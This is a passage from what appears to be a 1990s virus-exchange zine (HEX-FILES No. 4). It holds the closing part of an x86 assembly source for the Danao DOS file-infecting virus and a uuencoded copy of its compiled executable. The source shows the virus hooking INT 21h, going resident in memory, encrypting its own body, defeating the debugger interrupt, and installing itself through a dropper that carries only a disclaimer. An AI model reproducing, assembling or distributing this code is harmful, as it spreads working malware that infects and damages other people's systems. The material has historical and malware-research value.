jmp COMInit ;Assumes a com file (com sp is 0fffeh)
EXEInit:
xor bx,bx
mov ax,cs:[ChkVirPres]
int 21h
push bx
popf
jnc EXE_Infect_system
even
push es
pop word ptr cs:[Psp]
push es
pop ds
jmp short EXE_Ret_Host
EXE_Infect_system:
push es
pop word ptr cs:[Psp]
push cs
pop ds
push ds
pop es
xor si,si
xor di,di
mov cx,MemRequired2
call DecryptTop
mov ax,cs:[Psp]
push ax
pop es
push es
pop ds
jmp SavDS
_ioctl dw 4400h ;IOCTL function call
_openf db 3dh ;Open file function call
db 90h ;
_exec dw 4b00h ;Execute program function call
_findn db 12h ;find next function call
_findf db 11h ;find first function call
LowParaLen equ byte ptr $
PspParaLen dw 1fh
FileType db ? ;file type 1=com 0=exe c=?
InfectCount db ? ;counter I think ?
CodePatchCmpAh dw ?
CodePatch3fNop dw ?
HostTypeFlag dw ?
SizePara dw 16h
ChkVirPres dw FileInfMark ;Memory self-rec ID
SavedHost dw 15 dup (?) ;first 30 bytes of host
ComHostSave1 equ SavedHost+ExeSs
ComHostSave2 equ SavedHost+ExeSp
ComHostSave3 equ SavedHost+ExeIp
DisableI1: ;Disables INT 1 :)
push ds
push si
xor si,si
mov ds,si
mov ax,2
mov si,ax
shl si,1
mov bx,[si]
mov es,[si+2]
xchg dl,es:[bx] ;Put IRET in the INT 1 chain
pop si
pop ds
ret
ChkSysVir: ;Are you there? call
xor bx,bx
mov ax,cs:[ChkVirPres]
int 21h
push bx
popf ;If carry flag is set, then virus is TSR
jnc SavDS
EXE_Ret_Host: ;Restore Host program
nop
mov ax,es
and word ptr cs:[PspParaLen],10h ;set to 16, length of psp tricky :)
add ax,cs:[PspParaLen]
add cs:[SavedHost.ExeCs],ax
add cs:[SavedHost.ExeSs],ax
mov ss,cs:[SavedHost.ExeSs]
mov sp,cs:[SavedHost.ExeSp]
jmp dword ptr cs:[SavedHost.ExeIp] ; execute exe host program
SavDS:
push ds
pop word ptr cs:[Psp]
GetI21:
push es
xor bx,bx
mov es,bx
mov dx,es:[IntVecTab21] ;Get INT 21 offset
mov ds,es:[IntVecTab21+2] ;Get INT 21 segment
pop es
mov cs:[I21Off],dx ;Save it
mov cs:[I21Seg],ds ;Both
call RAMProc
mov ah,4ah ;Readjust allocation
mov bx,bp
call CallI21
mov word ptr es:[VirusRelocator],0a4f3h ;REP MOVSB
mov byte ptr es:[VirusRelocator+2],0cbh ;RET
push es
pop ss ;Move virus to the allocated mem
mov sp,13deh
push cs
pop ds
mov cx,offset ChkSysVir-7
shr cx,1
mov si,7
mov di,si
rep movsw
mov byte ptr cs:[InfectCount],0
mov cx,offset ReadBuff+32
mov ax,offset ChkSysVir
sub cx,ax
mov si,offset ChkSysVir
push cs
mov ax,offset SetI21
push ax
push es
pop word ptr cs:[RelocSeg]
mov word ptr cs:[RelocOff],VirusRelocator
jmp cs:[RelocVector] ;REP MOVSB / RET
SetI21: ;Setting up INT 21 for the virus
push es
pop ds
xor ax,ax
mov es,ax
mov dx,offset I21Proc
pushf
cli
mov es:[84h],dx
mov es:[86h],ds
sti
popf
push ds
pop es
mov ax,offset RetAllSeg
push ax
cmp word ptr cs:[HostTypeFlag],9090h
jne OK1
pop bx
mov ax,offset COM_Ret_Host
push ax
OK1:
mov si,offset Danao
mov di,offset EncryptBuff
mov cx,MemRequired2
mov ax,offset ChkCommandRetOff
push ax
call JmpDecryptTop
ChkCommandRetOff:
call ChkCommandRet
ret
RetAllSeg:
mov es,cs:[Psp]
mov ds,cs:[Psp]
jmp EXE_Ret_Host
JmpDecryptTop:
pop dx
DecryptTop: ;Decrypt the top portion of the virus
push es
push cx
push si
push di
xor dx,dx
mov dl,0cfh
call DisableI1
push cs
pop es
mov cx,8
mov si,offset CryptorCode
mov di,offset CryptorCodeBuff
cld
rep movsw
mov di,offset CryptorCodeBuff+1
add dx,0c801h ;C801h opcode = ROL AL,1 :)
mov ax,dx
mov cx,4
rep stosw
pop di
pop si
pop cx
pop es
jmp short CryptorCodeBuff
ChkCommandRet:
cmp byte ptr cs:[FileType],12 ;Command.com flag
je YesCommand
push ds
push dx
push cs
pop ds
mov ax,3d00h
mov dx,offset CommandHost
int 21h
mov bx,ax
mov ah,3eh
call CallI21
pop dx
pop ds
YesCommand:
ret
nop
CryptorCode: ;This is the actual decryptor :)
lodsb
add al,80h ; these are patched with: rol al,1
adc al,0 ; rol al,1
and al,0f0h ; rol al,1
xor al,40h ; rol al,1
stosb
loop CryptorCode
ret
ReadBuff dw 15 dup (?)
RelocVector equ dword ptr $-6
RelocOff equ word ptr $-6
RelocSeg equ word ptr $-4
HostName label dword
FileOff dw ?
FileSeg dw ?
I24 label dword
I24Off dw ?
I24Seg dw ?
I22 label dword
I22Off dw ?
I22Seg dw ?
HostAttr dw ?
DateStamp dw ?
TimeStamp dw ?
Int21FnAX dw ?
Int21FnAH equ byte ptr $-1
DrvNum db ?
Psp label word
TailLen db ?
db ?
HostSizeLo dw ?
HostSizeHi dw ?
ExecMark dw ?
CryptorCodeBuff equ $
SearchMask equ word ptr $
CurPtrPosLo dw ?
SearchMask2 equ word ptr $
CurPtrPosHi dw ?
StealthBuff dw 15 dup (?)
StackFrame db 50 dup (?)
InfectErrFlag equ StackFrame + 34
EncryptBuff db (ComInit-Danao) dup (?)
;----------------------------------------- First generation code
even
FirstGeneration:
cld ; relocate for org 0
mov ax,cs ; since dropper is com,
add ax,16 ; at present org is 100h
mov ds,ax
push ax
mov bx,offset continue
push bx
retf
YeZmess:
db 13,10,'YeZ Danao Virus Disassembly, HEX-FILES No. 4'
db 13,10,10,'Warning!!!',13,10,10
db 'This installs the Danao virus in your system. If you are not',13,10
db 'familiar with computer viruses or you do not know how to handle',13,10
db 'them, then *QUIT* this program immediately.',13,10,10
db 'HEX-FILES and YeZ are not responsible for damages arising from',13,10
db 'the use of this program. *USE AT YOUR OWN RISK*',13,10,10
db 'Do you want to proceed? (Yes/No): $'
even
continue:
mov ax,word ptr [Dyna1] ; do some house cleaning first
mov [CodePatchCmpAh],ax ; if you use, other compilers
mov ax,word ptr [Dyna2] ; it would still be ok :)
mov [CodePatch3fNop],ax
mov ax,9090h
mov word ptr [Dyna1],ax
mov word ptr [Dyna2],ax
mov [Psp],es
mov byte ptr cs:[InfectCount],0
push cs
pop es
cld
mov si,offset EncXEDMes
mov di,offset XEDMsg
mov cl,3
MesLoop: ; encrypt message and create
lodsb ; unencrypted copy
or al,al
je DoneCopy
stosb
rol al,cl
mov [si-1],al
jmp MesLoop
align 2
DoneCopy:
mov dx,offset YeZmess
mov ah,9
int 21h
get_key:
xor ax,ax ; get user permit
int 16h
or al,20h
cmp al,'y'
je got_key
cmp al,'n'
jne get_key
got_key:
push ax
and al,5fh
mov dl,al
mov ah,2
int 21h
pop ax
cmp al,'y'
je go_installer
quit_installer:
mov ax,4cffh
int 21h
even
go_installer:
xor bx,bx ; are we up there already?
mov ax,[ChkVirPres]
int 21h
test bx,1
jnz quit_installer
push cs
pop es
mov cl,4
mov si,offset Danao
mov di,offset EncryptBuff
mov bx,MemRequired2
encrypt_code: ; created encrypted copy of the
lodsb ; virus
ror al,cl
stosb
dec bx
jnz encrypt_code
mov ax,3521h
int 21h
mov [I21Off],bx
mov [I21Seg],es
mov es,[Psp]
mov ax,2521h
mov dx,offset I21Proc
int 21h
mov ax,3100h ; the virus TSR at top of memory but to make
mov dx,DanaoTsrLen+16 ; life easy for us, we would let the virus
int 21h ; TSR in low mem for first gen. let virus do
; the mcb handling on succeeding generations
end Danao ; if you dont know what +16 is for, its for psp
ÄÄ HF4LIST3.ASM ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄ HF4EXEC3.SCR STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
begin 644 dnao2869.com
MZ:$,#0M1(`T*36%B=6AA>2$-"@I4:&ES(&ES($1A;F%O+C(X-CD@=FER=7,@
M8V]M:6YG('1O('EO=2!F<F]M('1H92!0:&EL:7!P:6YE<RX-"D)R;W5G:'0@
M=&\@>6]U(&QI=F4@8GD@2$58+49)3$53($YO+B`T#0H*2$58+49)3$53(&%N
M9"!995H@87)E(&YO="!R97-P;VYS:6)L92!F;W(@86-T=6%L+"!I;7!L:65D
M(&%N9"]O<B!I;6%G:6YA<GD-"F1A;6%G92!A<FES:6YG(&1I<F5C=&QY(&]R
M(&EN9&ER96-T;'D@9G)O;2!T:&4@=7-E+"!M:7-U<V4@;W(@;F]N+75S92!O
M9@T*=&AI<R!P<F]G<F%M+B!4:&4@<&5R<V]N('=H;R!E>&5C=71E<R!T:&ES
M('!R;V=R86T@8F5A<G,@9G5L;"!R97-P;VYS:6)I;&ET>0T*9F]R(&AI<R]H
M97(@86-T:6]N<RX-"@I4:&ES('!R;V=R86T@:7,@<W1R:6-T;'D@9F]R(&5D
M=6-A=&EO;F%L(&]R(')E<V5A<F-H('!U<G!O<V5S(&]N;'DN#0H*"B0((!H.
M'[H'`;0)S2&T3,TA("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@($!$%$54(.;)XK-@
M,Y!74)_)M=G\XCINH`D)"0E'9.*C8E*01R+BHV)BD$>QXK-@\9!'0>*S8#*0
M1Z+BHV(2D$<RV>+_XL5PXK-@\9!'X.)\8($`"0GB?&"A``D)CCQ@OC".$C`%
M-14E977A8.)L8%.P``C/\U<PCK<PXFQ@GJ``XJ-B4I!'K>*C8F*01SWBHV(2
MD%<@OL>HX`@`XHC@GJ#B&.-NH`!$5Z9O+`='@`@O"&\L"%=`"8ZR,.!P^VN@
MZR@`,YSB"..>H`5G8.)L8)Z@,.*HX)Z@H)Q7,)LP`,K#`D<AP^)7,)M``,,6
M)V##IW<@P@*J+GYB;%``./XP8AC3-/1'D&(8TU2%1R"^BF#QJVN@XIAA3:#B
MR.%MH.$EX7#@\;BO(]X;`@OB+^IB&-,T].)L8)*0$$=A8AC35(7B;&"2D`!'
MP>(8XVZ@`$17,3C^@)MP`.N2<#]J5V#B;&"2D,"E\;BO(RT(UQ"C5U"H40@N
M\>*(88Z@X/'@<$MCC@I0T___5S">+1!_/G\>L"U7@--3L#<PGBP0CD!`-S">
MJQ"XC3.<,RV+("2.1U#B"..2D,!7,-)3L.*88=Z@XCJ^H#BO`'=0TP!`)R2X
MCU#P`#@M`%(/_[*/FP$`?Q_B.A.0X/'B&.-NH`!41^*+`'6.\E#BF.!.H.*8
M82Z@(]ZPG$?@CAU`L`Q'<+,<5]">$1#B&DZ@"Q'B.DZ@,YPS+8L`)([?0.#Q
MF\$`JVN@N"]+\X[N0#.<,RV+`"2.3D";P0!+\ZM3D(Z=0.(8XVN@U*5'0N((
MXY*0$$>PX@CCDI#`1S">VP#B&.,3D`#P)S">&P".T4"^UN(:3*#B.C20XAIL
MH.(Z5)#B&JR@XCJ4D.(:S*#B.K20XCKRD.*X1*#BL$3`1_/B&KZ@XKAAWJ";
M`"!_'[`M1Q`$XIA$0.*812"+2H#B.JR@XAH3D.*R8.N@XCK,H.(Z3*#B.$1`
M4.)\8&R@5K`SG+@=BP`DCE-`X@CCHI"1YX".EC"+`##_#HXO(.*XX$Z@XKAA
M+J"+$'6.(4#B&FZ@XK-@,I!7<.)\8/Z@``Q+XXZ_,.((XWZ@TU?1XACC_J``
M#%=!XKACLI#BF&.!`.*X8]*0XIACH0#BN.`.H(L0-.)<84V@CFPPBT)2XEQA
MC:".NS#B&FZ@XK-@\9!'1],`5$?V</'UY:65M879XO_BQ7!+\HZ),Q"//_
M5S`X/'`8]Y!4A4=P&/>0-/17-+CT<0B?`$>S(]Z.@C"S'%<C./?Q`'=P&/?1
M4_!G4ACWH(541U$8]Z#TU%=Q&/<0-/17<!CW4!3D1Y`8]M%3L#CU\0"%</'U
MY:65M879_/&EE;XHA14EX8L`=8XR,.*8X$Z@XIAA+J`CWK"<1QZ.7""S'%>M
MBQ`D,RTSG(X@,.(Z/Z#BF&$?H+`,5SRP+5?[X/&+`"0SG#,MCEX@F\$`JVN@
M2_..K2"+`"0S+3.<C@T@XACC:Z#4I>)L8)*0`$<1X@CC>Z">XFQ@DI`01S">
MY_\SG#,MBR`DCFH@TE.P.*T`XCJ^H.*88=Z@N*RX#3@L\#@=`#@N#Q@L,Y`X
M'0"+`"2.UR!+\YOA`*M?H(XG(+@O&,/_1$<PGE/_,YPS+8L`)([5(+@_CGT`
M-^"+0E+B7&&-H(ZT()YA_^#QN(U+!)O!`*M_H(Z3(.*XX-Z@XKAAOJ"+`"2.
MDB`SG$L$CB(@XKC@'Z#BN&$_H(L`)(XA(.(:3J`;0#V,/0X]CCT,XCI.H+B,
MXKAA+J"+$'6./Q!+XX[N$/&EE;CM2_..3A!5N,Z8Y,"89`')^&0AU:M=4.#Q
MXGQ@;J``5.)\8($`"0GB?&"A``D)XACC_J``#%?RXGQ@_J`0`&`UBR)3CDH0
MXICAS:#BRMH+5P2Q6..1#HO27X8*``X/A@P`">ZM^>,,]@CA80<(L`-.)<
M84V@CA<0XIC@#J"+$#2;`@".-A#B".-3L`!'()\\XEQA3:"+(-..Y!`\">)\
M8/Z@``SB7&%-H$O3W!*XC4OCCE,0XO_BS:";P0"K:Z!+!(Y2$(L!`.*X8Q.0
M?VZXK+@-BP`DCA$0X@CCDI``1W'B"..2D,!7\#.<XKAAOJ"R?8L`)(XO`.((
M8W*0\.+O8**0CB40JU2PFR.`2P2.G0";(X"+4["R'+B,JR.`,/Q+!(Y<`(YH
M`#Q+H:M?H(Z;`.)\8!^@HN+B?&`_H*(`JQ^@2^2;`@"."@"K,;!+%(Z)`.)L
M8**0H#SB&FN@XCHTD.(:BZ#B.E20XAJKH.(ZE)#B;&!KH)Z+`0#BN&,3D']N
M4!J`XCI[H.(::Z#B,&"+H'^-XCJKH.)\8/*0"0D\N!RX#1M`/8XM+CVLN*P\
M!>(:3J`C3K@-&T`]CCVN/2PP#>(:3J"H3^*884Z@A3R+0E..80#BF.&-H.+(
M8*V@X/&K:'"+0E*.$``\R>+_X<5P/#3TU-04Y$3B-/34`#&\'1`LHB(0MS,0
M(K`WL+<6H;(QN@*,2A`1*[>ZN1"P$+*ZD!$0`.D!`1`FEZ,"A51$`O9F`D06
MYA;VPC16)E=`D4D"(F7V5S<"%@)65Q(B`@DC#.)L8%.PX/P)8'5EX7#K4W"+
M!G#[5+`PC\_*H`Q'4`T,JKYOY?5P/`E+)8[&_V*X=._H#&(:$`#B.OZ@XNA@
MGJ#BZ.&>H!CB(``4$+CB(`#(K;*N2Z2[__^.X_]+I(Z3_Z3HK0CC``"E5U!L
M8```U`D:,`"XC=(4$#`-.C``).@L8FQ@``"EXO]C_J!B^&`0`&)\8#``!!`D
MZ"QB?^H``,8GQ@;J``M#PSY+L0`.@``%F,R('I-PCWXP/!@](`]_-0N%`(
M4,L6+H\&Z0HSVRZA,PG-(5.=<P+K&`X?'@>^``"+_KDR".CJ`2ZAZ0J.P.DH
M`2ZAZ0J.T([8CL"\_O\NH4,)HP`!+J%%":,"`2ZA20FC!`$>NP`!4\NXC-,5
M,W5R^=3_BL2!P_T/CMB[!@"!/X``<ABZSP#HC@!S`0"["@`F_R]YU</4_P"X
MB">[#@"!/X``=^B!_``@<@/I2?\SVRZA,PG-(5.=<PN0!BZ/!ND*!A_K=P8N
MCP;I"@X?'@<S]C/_N3((Z$D!+J'I"E`'!A_I?P``1#V0`$L2$1```0.`_#^0
MD)!``/]$Z;X!#2`@(`T*36%B=6CIO@$-"@H@(&ES(&ES(```'E8S]H[>N`(`
MB_#1YHL<CD0")H877A_#,]LNH3,)S2%3G7,GD(S`+H,F)PD0+@,&)PDN`09+
M"2X!!D,)+HX60PDNBR9%"2[_+DD)'BZ/!ND*!C/;CL,FBQ:$`":.'H8`!RZ)
M%EP'+HP>7@?H[_VT2HO=Z%K])L<&`!+SI";&!@(2RP87O-X3#A^Y9`G1Z;X'
M`(O^\Z4NQ@8J"0"YU@JX:PDKR+YK"0ZX$`I0!BZ/!M`*+L<&S@H`$B[_+LX*
M!A\SP([`N@<`G/HFB1:$`":,'H8`^YT>![A/"E`N@3XO"9"0=05;N'P(4+X`
M`+]%"[DR"+A+"E#H$0#H/`##+HX&Z0HNCA[I"ND;_UH&4597,]*RS^CK_@X'
MN0@`OJD*O_$*_/.EO_(*@<(!R(O"N00`\ZM?7ED'ZV<N@#XI"0QT%1Y2#A^X
M`#VZ*0?-(8O8M#[H??Q:'\.0K`2`%``D\#1`JN+TP^FA#`T+42`-"DUA8G5H
M87DA#0H*5&AI<R!I<R```#4%MP-5`;<#`````"``<"72>@!+`0````0```#`
M``#@)@``````````````````````*@`-````````````````````````````
7````````````````````````````````
`
end
ÄÄ HF4EXEC3.SCR ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
-=<{[* HF4 *]}>=-